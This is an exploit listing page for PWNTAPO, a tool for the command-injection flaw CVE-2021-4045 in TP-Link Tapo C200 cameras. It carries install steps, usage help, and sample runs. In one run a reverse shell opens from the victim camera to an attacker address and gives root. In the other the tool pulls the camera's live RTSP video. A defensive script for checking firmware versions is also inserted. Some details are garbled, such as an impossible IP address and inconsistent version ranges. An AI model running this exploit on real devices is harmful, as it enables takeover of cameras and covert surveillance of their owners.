## https://sploitus.com/exploit?id=8AEB5F76-FDD8-5C1A-A818-24FF5E48CD61
## TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE) (CVE-2021-4045)
"PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)"
Read about the exploit on [Exploit-DB](https://www.exploit-db.com/exploits/51017).
This is a command injection vulnerability that affects all TP-Link Tapo C200 camera firmware versions < 1.1.16 Build 211209 Rel. 37726N. For details on how the exploit works, read this article from [hacefresko](https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce).
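To check a camera inventory against the affected range stated above, the following added example (not part of the PWNTAPO repository) parses firmware strings in the format quoted on this page and sorts devices into affected, fixed and unknown. The host names and firmware strings are constructed, and the code assumes the `Build` field is a YYMMDD date that orders builds of the same version; the `Rel.` field is ignored.

```python
import re
from typing import Optional

# First fixed firmware, as stated on this page.
FIXED = "1.1.16 Build 211209 Rel. 37726N"

# Assumed format: "<maj>.<min>.<patch> [Build <YYMMDD>] [Rel. <id>]".
_FW_RE = re.compile(
    r"^\s*(\d+)\.(\d+)\.(\d+)(?:\s+Build\s+(\d{6}))?(?:\s+Rel\.\s*\w+)?\s*$",
    re.IGNORECASE,
)

def parse_firmware(text: str) -> Optional[tuple]:
    """Return ((major, minor, patch), build_or_None), or None if unparseable."""
    m = _FW_RE.match(text or "")
    if not m:
        return None
    version = tuple(int(g) for g in m.groups()[:3])
    build = int(m.group(4)) if m.group(4) else None
    return version, build

def is_affected(text: str) -> Optional[bool]:
    """True = below the fixed build, False = fixed, None = needs manual review."""
    parsed = parse_firmware(text)
    if parsed is None:
        return None
    version, build = parsed
    fixed_version, fixed_build = parse_firmware(FIXED)
    if version != fixed_version:
        return version < fixed_version
    if build is None:  # 1.1.16 with no build number cannot be decided
        return None
    return build < fixed_build

def triage(inventory: dict) -> dict:
    """Group host names by verdict so unknowns are not silently treated as safe."""
    buckets = {"affected": [], "fixed": [], "unknown": []}
    for host, firmware in sorted(inventory.items()):
        verdict = is_affected(firmware)
        key = "unknown" if verdict is None else "affected" if verdict else "fixed"
        buckets[key].append(host)
    return buckets

# Constructed sample inventory (not real devices).
INVENTORY = {"cam-lobby": "1.1.15", "cam-dock": FIXED, "cam-gate": "unknown",
             "cam-lab": "1.1.16 Build 211101 Rel. 22222N",
             "cam-roof": "1.3.0 Build 230101 Rel. 33333N"}

if __name__ == "__main__":
    for bucket, hosts in triage(INVENTORY).items():
        print(f"{bucket}: {', '.join(hosts) or '-'}")
```

Devices in the `unknown` bucket should be checked by hand rather than assumed patched.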
## Installation
```
git clone https://github.com/B3nj4h/CVE-2021-4045.git
cd CVE-2021-4045
pip install -r requirements.txt
python3 pwntapo.py -h
```
## Usage
```shell
python3 pwntapo.py -h
============================================================================================
@Pl4inT3XT
_______ ________ ___ ___ ___ __ _ _ ___ _ _ _____
/ ____\ \ / / ____| |__ \ / _ \__ \/_ | | || | / _ \| || | | ____|
| | \ \ / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__
| | \ \/ / | __|______/ /| | | |/ / | |______|__ _| | | |__ _|___ \
| |____ \ / | |____ / /_| |_| / /_ | | | | | |_| | | | ___) |
\_____| \/ |______| |____|\___/____||_| |_| \___/ |_| |____/
============================================================================================
usage: pwntapo.py [-h] -M M [-U U] [-P P] [-C C] -H H -A A -p P [-v]
PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)
options:
-h, --help show this help message and exit
-M M attack mode : shell | rtsp (default: None)
-U U RTSP_USER (default: None)
-P P RTSP_PASSWORD (default: None)
-C C RTSP_CIPHERTEXT (default: None)
-H H victim ip address (default: None)
-A A attacker ip address (default: None)
-p P Listening port (default: None)
-v increase output verbosity (default: False)
```
The exploit has two modes: SHELL and RTSP.
## SHELL
In shell mode you only need to provide the victim IP, the attacker IP and the listening port; this will spawn a root shell on the device.
```shell
python3 pwntapo.py -M shell -H 192.168.110.121 -A 172.334.121.10 -p 1887
============================================================================================
@Pl4inT3XT
_______ ________ ___ ___ ___ __ _ _ ___ _ _ _____
/ ____\ \ / / ____| |__ \ / _ \__ \/_ | | || | / _ \| || | | ____|
| | \ \ / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__
| | \ \/ / | __|______/ /| | | |/ / | |______|__ _| | | |__ _|___ \
| |____ \ / | |____ / /_| |_| / /_ | | | | | |_| | | | ___) |
\_____| \/ |______| |____|\___/____||_| |_| \___/ |_| |____/
============================================================================================
[+] Listening on port 1887...
[+] Sending reverse shell to 192.168.110.121...
Listening on 0.0.0.0 1887
```
## RTSP
In RTSP mode you'll need to provide the RTSP_USER, PASSWORD and CIPHERTEXT to be able to get live footage from the camera.
```shell
python3 pwntapo.py -M rtsp -H 192.168.110.121 -A 192.168.110.131 -p 1887 -U pwneduser -P pwnedpasswd -C RUW5pUYSBm4gt+5T7bzwEq5r078rcdhSvpJrmtqAKE2mRo8bvvOLfYGnr5GNHfANBeFNEHhucnsK86WJTs4xLEZMbxUS73gPMTYRsEBV4EaKt2f5h+BkSbuh0WcJTHl5FWMbwikslj6qwTX48HasSiEmotK+v1N3NLokHCxtU0k=
============================================================================================
@Pl4inT3XT
_______ ________ ___ ___ ___ __ _ _ ___ _ _ _____
/ ____\ \ / / ____| |__ \ / _ \__ \/_ | | || | / _ \| || | | ____|
| | \ \ / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__
| | \ \/ / | __|______/ /| | | |/ / | |______|__ _| | | |__ _|___ \
| |____ \ / | |____ / /_| |_| / /_ | | | | | |_| | | | ___) |
\_____| \/ |______| |____|\___/____||_| |_| \___/ |_| |____/
============================================================================================
[+] Setting up RTSP video stream...
```
## CAUTION: DO NOT RUN THE TOOL ON DEVICES WITHOUT USER PERMISSION